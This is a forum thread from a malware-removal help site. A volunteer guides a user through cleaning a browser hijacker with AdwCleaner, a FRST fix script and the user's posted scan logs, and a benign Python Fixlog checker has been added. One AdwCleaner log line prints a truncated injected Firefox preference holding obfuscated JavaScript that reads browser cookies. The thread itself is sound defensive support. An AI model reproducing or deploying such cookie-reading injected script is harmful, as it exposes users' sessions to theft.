
Antivirus definitions are not getting updated! [Solved]

  • This topic is locked
19 replies to this topic

#1 vijay.gupta


Posted 10 February 2015 - 12:58 AM

Hi,

 

Somehow, my machine was infected with Elex Smart Search malware, as a result of which the start pages of IE, Firefox and Chrome changed and Symantec Antivirus also started showing that AntiVirus definitions are not up to date. When I tried to run LiveUpdate, it ran fine and said the session was complete, but the antivirus still showed "AntiVirus definitions are not up to date". So, I googled and found the following link:

 

http://www.malwarere...l-instructions/

 

I followed all the instructions and many infections were removed; however, the antivirus still says "AntiVirus definitions are not up to date". Now, it seems that something else is also happening in my system which requires investigation.

 

I tried all the steps that you have asked before posting here on the following link:

 

http://forums.whatth...howtopic=106388

 

Please find attached the required files.

 

Thanks,

Vijay Gupta


#2 OCD


Posted 10 February 2015 - 07:24 PM

Hi vijay.gupta,

My name is OCD. I would be more than happy to take a look at your log and help you with solving any malware problems you might have. Logs can take a while to research, so please be patient and know that I am working hard to get you a clean and functional system back in your hands. I'd be grateful if you would note the following:

  • I will be working on your malware issues; this may or may not solve other issues you have with your machine.
  • The fixes are specific to your problem and should only be used for the issues on this machine.
  • Please continue to review my answers until I tell you your machine appears to be clear. Absence of symptoms does not mean that everything is clear.
  • It's often worth reading through these instructions and printing them for ease of reference.
  • If you don't know or understand something, please don't hesitate to say or ask!! It's better to be sure and safe than sorry.
  • Please reply to this thread. Do not start a new topic.
  • Copy and Paste logs directly into the reply window. DO NOT attach the logs unless specifically instructed to do so.

IMPORTANT NOTE : Please do not delete, download or install anything unless instructed to do so.

DO NOT use any TOOLS such as Combofix or HijackThis fixes without supervision. Doing so could make your system inoperable and could require a full reinstall of your Operating System and losing all your programs and data.

Please stay with this topic until I let you know that your system appears to be "All Clear"

Important: All tools MUST be run from the Desktop.

=========================

What version of Symantec Antivirus are you running, and what definitions version is currently installed?

=========================

P2P - (Peer to Peer)

I see you have/had P2P software uTorrent installed on your machine. We are not here to pass judgment on file-sharing as a concept. However, we will warn you that engaging in this activity and having this kind of software installed on your machine will always make you more susceptible to re-infections and possibly Identity Theft. It likely contributed to your current situation. This page will give you further information.

Please note: Even if you are using a "safe" P2P program, it is only the program that is safe. You will be sharing files from uncertified sources, and these are often infected. The bad guys use P2P filesharing as a major conduit to spread their wares.

I would strongly recommend that you uninstall this now.

Click Start > Control Panel > Programs and Features. Locate and select the following that are present on the list and click the Remove button:

  • uTorrent

If you choose not to remove this program, please refrain from using it until we have finished cleaning your computer.

=========================

Security Check

Download Security Check by screen317 from here or here.

  • Save it to your Desktop.
    • Windows XP : Double click on the icon to run it.
    • Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.

=========================

Please download AdwCleaner by Xplode and save to your Desktop.

    • Windows XP : Double click on the icon to run it.
    • Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
  • After the scan has finished, click on the Report button...a log file (AdwCleaner[R0].txt) will open in Notepad for review.
  • The contents of the log file may be confusing. Unless you see a program name that you know should not be removed, don't worry about it. If you see an entry you want to keep, let me know about it.
  • Copy and paste the contents of that log file in your next reply.
  • A copy of all log files is saved in the C:\AdwCleaner folder which was created when running the tool.

=========================

FRST Fix Script

Open notepad. Please copy the contents of the code box below. To do this highlight the contents of the box and right click on it. Paste this into the open notepad. Save it on the desktop as fixlist.txt




Start
CloseProcesses:
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: G - G:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: H - H:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: I - I:\AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {0ad399b3-408c-11e4-80a4-00247eb188db} - G:\AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {0ad399db-408c-11e4-80a4-00247eb188db} - G:\AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {0ad39c25-408c-11e4-80a4-00247eb188db} - G:\Windows/AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {1d830ad5-a71b-11e4-bb6a-00247eb188db} - G:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {35e1f900-af55-11e4-a197-00247eb188db} - G:\AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {57b233e9-f843-11e3-b35c-00247eb188db} - G:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {57b233ea-f843-11e3-b35c-00247eb188db} - G:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {9ececd09-f473-11e3-bf20-00247eb188db} - I:\AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {d1e8a766-a907-11e4-870d-00247eb188db} - H:\setup_vmb_lite.exe /checkApplicationPresence
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
EmptyTemp:
End

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST and press the Fix button just once and wait.
The tool will make a log (Fixlog.txt); please post it in your reply.

=========================

Re-run Farbar Recovery Scan Tool; it should be on your desktop.

    • Windows XP : Double click on the icon to run it.
    • Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
  • When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.

=========================

In your next post please provide the following:

  • checkup.txt
  • AdwCleaner[R0].txt
  • Fixlog.txt
  • new FRST.txt

OCD

Proud Graduate of WTT Classroom
Member of UNITE

Threads will be closed if no response after 5 days
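
The fix script above asks FRST to remove a series of MountPoints2 autorun entries, and FRST reports the outcome of each in Fixlog.txt. The following is an added example, not part of the original thread or of FRST itself, that cross-checks a Fixlog against its own fixlist and reports any MountPoints2 entry that has no "Key deleted successfully" result. The function names are hypothetical, the sample log is constructed in the layout FRST produces in this thread, and the SID and the last GUID in it are placeholders.

```python
import re

# Constructed sample in the Fixlog layout seen in this thread.
# The SID (S-1-5-21-0-0-0-1000) and the 11111111-... GUID are placeholders.
SAMPLE_FIXLOG = r'''Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 08-02-2015
Ran by USER at 2015-02-11 11:54:45 Run:1

Content of fixlist:
*****************
Start
CloseProcesses:
HKU\S-1-5-21-0-0-0-1000\...\MountPoints2: G - G:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-0-0-0-1000\...\MountPoints2: I - I:\AutoRun.exe
HKU\S-1-5-21-0-0-0-1000\...\MountPoints2: {0ad399b3-408c-11e4-80a4-00247eb188db} - G:\AutoRun.exe
HKU\S-1-5-21-0-0-0-1000\...\MountPoints2: {11111111-2222-3333-4444-555555555555} - H:\AutoRun.exe
EmptyTemp:
End
*****************

Processes closed successfully.
"HKU\S-1-5-21-0-0-0-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\G" => Key deleted successfully.
"HKU\S-1-5-21-0-0-0-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\I" => Key deleted successfully.
"HKU\S-1-5-21-0-0-0-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0ad399b3-408c-11e4-80a4-00247eb188db}" => Key deleted successfully.
HKCR\CLSID\{0ad399b3-408c-11e4-80a4-00247eb188db} => Key not found.
EmptyTemp: => Removed 721.4 MB temporary data.

==== End of Fixlog 11:55:48 ====
'''

# Fixlist directive: HKU\<SID>\...\MountPoints2: <drive letter or {GUID}> - <autorun command>
DIRECTIVE_RE = re.compile(
    r'^HKU\\[^\\]+\\\.\.\.\\MountPoints2: '
    r'(?P<name>\{[0-9a-fA-F-]+\}|[A-Za-z]) - (?P<command>.+)$'
)
# Result line: optionally quoted target, then "=>", then the status text
RESULT_RE = re.compile(r'^"?(?P<target>[^"]+?)"?\s+=>\s+(?P<status>.+)$')


def split_fixlog(text):
    """Return (directives, results): the echoed fixlist lines and the outcome lines."""
    directives, results = [], []
    section = "header"
    for raw in text.splitlines():
        line = raw.strip()
        if section == "header":
            if line == "Start":
                section = "fixlist"
        elif section == "fixlist":
            if line == "End":
                section = "results"
            elif line:
                directives.append(line)
        else:
            if line.startswith("==== End of Fixlog"):
                break
            if "=>" in line:
                results.append(line)
    return directives, results


def audit_mountpoints(text):
    """Pair each MountPoints2 directive with whether its key was reported deleted."""
    directives, results = split_fixlog(text)
    deleted = set()
    for line in results:
        m = RESULT_RE.match(line)
        # The HKCR\CLSID "Key not found" lines are secondary lookups, not failures,
        # so only results under ...\MountPoints2\ count here.
        if m and "\\MountPoints2\\" in m["target"] and m["status"].startswith("Key deleted"):
            deleted.add(m["target"].rsplit("\\", 1)[1].lower())
    report = []
    for line in directives:
        m = DIRECTIVE_RE.match(line)
        if m:
            report.append({
                "entry": m["name"],
                "command": m["command"],
                "removed": m["name"].lower() in deleted,
            })
    return report


def unresolved(text):
    """Names of MountPoints2 entries the fixlist targeted but the log never confirms."""
    return [r["entry"] for r in audit_mountpoints(text) if not r["removed"]]


if __name__ == "__main__":
    for row in audit_mountpoints(SAMPLE_FIXLOG):
        print("removed " if row["removed"] else "MISSING ", row["entry"], "->", row["command"])
```
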










#3 vijay.gupta


Posted 11 February 2015 - 12:42 AM

Checkup.txt

 

 Results of screen317's Security Check version 0.99.96  
 Windows 7 Service Pack 1 x86 (UAC is enabled)  
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:``````````````
 Windows Firewall Enabled!  
Symantec Endpoint Protection   
 WMI entry may not exist for antivirus; attempting automatic update.
`````````Anti-malware/Other Utilities Check:`````````
 Ad-Aware
 CCleaner     
 Java 7 Update 60  
 Java SE Development Kit 7 Update 60
 Java version 32-bit out of Date!
 Adobe Flash Player 10 Flash Player out of Date!
  Java 64-bit 8 Update 31  
 Adobe Flash Player     16.0.0.305  
 Adobe Reader 9 Adobe Reader out of Date!
 Mozilla Firefox 31.0 Firefox out of Date!  
 Google Chrome (40.0.2214.111)
````````Process Check: objlist.exe by Laurent````````  
 Norton ccSvcHst.exe
 Ad-Aware AAWService.exe
 Ad-Aware AAWTray.exe
`````````````````System Health check`````````````````
 Total Fragmentation on Drive C: 0%
````````````````````End of Log``````````````````````
 

 

AdwCleaner[R0]:

 

# AdwCleaner v4.110 - Logfile created 11/02/2015 at 11:46:34
# Updated 05/02/2015 by Xplode
# Database : 2015-02-09.1 [Server]
# Operating system : Windows 7 Home Basic Service Pack 1 (x86)
# Username : VIJAY - VIJAY-PC
# Running from : C:\Users\VIJAY\Desktop\AdwCleaner.exe
# Option : Scan

***** [ Services ] *****


***** [ Files / Folders ] *****


***** [ Scheduled tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****


***** [ Web browsers ] *****

-\\ Internet Explorer v11.0.9600.17496


-\\ Mozilla Firefox v31.0 (x86 en-US)

[agyg75sl.default] - Line Found : user_pref("extensions.dGngmy3KVsGqkpGt.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"rjrErTwEqdw5qTnEpja7rdY9qHk\")>-1||url.indexOf(\"acebook\")>-[...]

-\\ Google Chrome v

*************************

AdwCleaner[R0].txt - [877 bytes] - [11/02/2015 11:46:34]

########## EOF - C:\AdwCleaner\AdwCleaner[R0].txt - [935 bytes] ##########
 

 

Fixlog.txt

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 08-02-2015
Ran by VIJAY at 2015-02-11 11:54:45 Run:1
Running from C:\Users\VIJAY\Desktop
Loaded Profiles: VIJAY (Available profiles: VIJAY)
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
Start
CloseProcesses:
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: G - G:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: H - H:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: I - I:\AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {0ad399b3-408c-11e4-80a4-00247eb188db} - G:\AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {0ad399db-408c-11e4-80a4-00247eb188db} - G:\AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {0ad39c25-408c-11e4-80a4-00247eb188db} - G:\Windows/AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {1d830ad5-a71b-11e4-bb6a-00247eb188db} - G:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {35e1f900-af55-11e4-a197-00247eb188db} - G:\AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {57b233e9-f843-11e3-b35c-00247eb188db} - G:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {57b233ea-f843-11e3-b35c-00247eb188db} - G:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {9ececd09-f473-11e3-bf20-00247eb188db} - I:\AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {d1e8a766-a907-11e4-870d-00247eb188db} - H:\setup_vmb_lite.exe /checkApplicationPresence
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
EmptyTemp:
End
*****************

Processes closed successfully.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\G" => Key deleted successfully.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\H" => Key deleted successfully.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\I" => Key deleted successfully.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0ad399b3-408c-11e4-80a4-00247eb188db}" => Key deleted successfully.
HKCR\CLSID\{0ad399b3-408c-11e4-80a4-00247eb188db} => Key not found.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0ad399db-408c-11e4-80a4-00247eb188db}" => Key deleted successfully.
HKCR\CLSID\{0ad399db-408c-11e4-80a4-00247eb188db} => Key not found.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0ad39c25-408c-11e4-80a4-00247eb188db}" => Key deleted successfully.
HKCR\CLSID\{0ad39c25-408c-11e4-80a4-00247eb188db} => Key not found.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{1d830ad5-a71b-11e4-bb6a-00247eb188db}" => Key deleted successfully.
HKCR\CLSID\{1d830ad5-a71b-11e4-bb6a-00247eb188db} => Key not found.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{35e1f900-af55-11e4-a197-00247eb188db}" => Key deleted successfully.
HKCR\CLSID\{35e1f900-af55-11e4-a197-00247eb188db} => Key not found.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{57b233e9-f843-11e3-b35c-00247eb188db}" => Key deleted successfully.
HKCR\CLSID\{57b233e9-f843-11e3-b35c-00247eb188db} => Key not found.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{57b233ea-f843-11e3-b35c-00247eb188db}" => Key deleted successfully.
HKCR\CLSID\{57b233ea-f843-11e3-b35c-00247eb188db} => Key not found.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{9ececd09-f473-11e3-bf20-00247eb188db}" => Key deleted successfully.
HKCR\CLSID\{9ececd09-f473-11e3-bf20-00247eb188db} => Key not found.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d1e8a766-a907-11e4-870d-00247eb188db}" => Key deleted successfully.
HKCR\CLSID\{d1e8a766-a907-11e4-870d-00247eb188db} => Key not found.
"HKLM\SOFTWARE\Policies\Google" => Key deleted successfully.
HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
EmptyTemp: => Removed 721.4 MB temporary data.


The system needed a reboot.

==== End of Fixlog 11:55:48 ====

 

FRST.txt

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 08-02-2015
Ran by VIJAY (administrator) on VIJAY-PC on 11-02-2015 12:04:56
Running from C:\Users\VIJAY\Desktop
Loaded Profiles: VIJAY (Available profiles: VIJAY)
Platform: Microsoft Windows 7 Home Basic  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_9691412ff1876250\stacsv.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Symantec Corporation) C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Symantec Corporation) C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
(Lavasoft) C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe
(Symantec Corporation) C:\Program Files\Symantec\Symantec Endpoint Protection\SmcGui.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_9691412ff1876250\AEstSrv.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
() C:\ProgramData\DatacardService\HWDeviceService.exe
(Hewlett-Packard Company) C:\Program Files\Common Files\LightScribe\LSSrvc.exe
(Huawei Technologies Co., Ltd.) C:\ProgramData\DatacardService\DCSHelper.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
() C:\Program Files\CyberLink\Shared files\RichVideo.exe
(Symantec Corporation) C:\Program Files\Symantec\Symantec Endpoint Protection\Rtvscan.exe
(Check Point Software Technologies) C:\Program Files\CheckPoint\Endpoint Connect\TracSrvWrapper.exe
() C:\Program Files\Reliance 3G\AssistantServices.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Vodafone) C:\Program Files\Vodafone\Vodafone Mobile Broadband\Bin\VmbService.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(CyberLink Corp.) C:\Program Files\Hp\QuickPlay\QPService.exe
( Hewlett-Packard Development Company, L.P.) C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QLBCTRL.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe
(Hewlett-Packard) C:\Program Files\Hp\HP Software Update\hpwuschd2.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
(Check Point Software Technologies) C:\Program Files\CheckPoint\Endpoint Connect\TrGUI.exe
(Lavasoft) C:\Program Files\Lavasoft\Ad-Aware\AAWTray.exe
(Symantec Corporation) C:\Program Files\Common Files\Symantec Shared\ccApp.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray.exe
() C:\Program Files\Reliance 3G\UIExec.exe
() C:\Q4SearchInstall\bin\Q4Search.exe
(Vodafone) C:\Program Files\Vodafone\Vodafone Mobile Broadband\Bin\MobileBroadband.exe
(Hewlett-Packard Company) C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files\Hewlett-Packard\Shared\hpqWmiEx.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe
(Google Inc.) C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\GoogleCrashHandler.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe
() C:\Program Files\Hewlett-Packard\Shared\HpqToaster.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\HP Health Check\HPHC_Service.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\plugin-container.exe
(Adobe Systems, Inc.) C:\Windows\System32\Macromed\Flash\FlashPlayerPlugin_16_0_0_305.exe
(Adobe Systems, Inc.) C:\Windows\System32\Macromed\Flash\FlashPlayerPlugin_16_0_0_305.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [282624 2009-05-15] (Alps Electric Co., Ltd.)
HKLM\...\Run: [QPService] => C:\Program Files\HP\QuickPlay\QPService.exe [468264 2009-06-24] (CyberLink Corp.)
HKLM\...\Run: [UCam_Menu] => C:\Program Files\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe [218408 2009-02-18] (CyberLink Corp.)
HKLM\...\Run: [QlbCtrl.exe] => C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe [320056 2009-06-25] ( Hewlett-Packard Development Company, L.P.)
HKLM\...\Run: [UpdatePRCShortCut] => C:\Program Files\Hewlett-Packard\Recovery\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink Corp.)
HKLM\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [35696 2009-02-28] (Adobe Systems Incorporated)
HKLM\...\Run: [HP Software Update] => C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe [54576 2008-12-09] (Hewlett-Packard)
HKLM\...\Run: [WirelessAssistant] => C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe [498744 2009-07-23] (Hewlett-Packard)
HKLM\...\Run: [Check Point Endpoint Security] => C:\Program Files\CheckPoint\Endpoint Connect\TrGUI.exe [801968 2011-09-14] (Check Point Software Technologies)
HKLM\...\Run: [ccApp] => C:\Program Files\Common Files\Symantec Shared\ccApp.exe [115624 2013-09-04] (Symantec Corporation)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray.exe [495708 2010-03-23] (IDT, Inc.)
HKLM\...\Run: [SunJavaUpdateSched] => "C:\Program Files\Java\jre7\bin\jusched.exe"
HKLM\...\Run: [NvBackend] => C:\Program Files\NVIDIA Corporation\Update Core\NvBackend.exe [2403104 2014-07-25] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [UIExec] => C:\Program Files\Reliance 3G\UIExec.exe [157000 2012-11-26] ()
HKLM\...\Run: [Q4Search Assistance Client] => C:\Q4SearchInstall\bin\Q4Search.exe [5164792 2014-09-27] ()
HKLM\...\Run: [MobileBroadband] => C:\Program Files\Vodafone\Vodafone Mobile Broadband\Bin\MobileBroadband.exe [279552 2011-06-28] (Vodafone)
HKLM\...\Run: [Ad-Watch] => C:\Program Files\Lavasoft\Ad-Aware\AAWTray.exe [506712 2009-01-19] (Lavasoft)
HKLM\...\RunOnce: [NCPluginUpdater] => C:\Program Files\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe [21720 2014-12-16] (Hewlett-Packard)
HKU\S-1-5-19\...\RunOnce: [] => [X]
HKU\S-1-5-20\...\RunOnce: [] => [X]
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\Run: [LightScribe Control Panel] => C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe [2363392 2009-06-18] (Hewlett-Packard Company)
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\Run: [Google Update] => C:\Users\VIJAY\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2014-08-09] (Google Inc.)
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\Policies\system: [WallpaperStyle] 2
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\Policies\system: [EnableLUA] 1
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\Policies\Explorer: [NofolderOptions] 0
HKU\S-1-5-18\...\Policies\system: [WallpaperStyle] 2
HKU\S-1-5-18\...\Policies\system: [EnableLUA] 1
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\Users\VIJAY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\S5830i_Modem_Files.zip.lnk
ShortcutTarget: S5830i_Modem_Files.zip.lnk -> C:\ProgramData\{31d2e005-3d7a-7eda-31d2-2e0053d78014}\S5830i_Modem_Files.zip.exe (No File)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.symantec....ponse/index.jsp
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.symantec....ponse/index.jsp
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
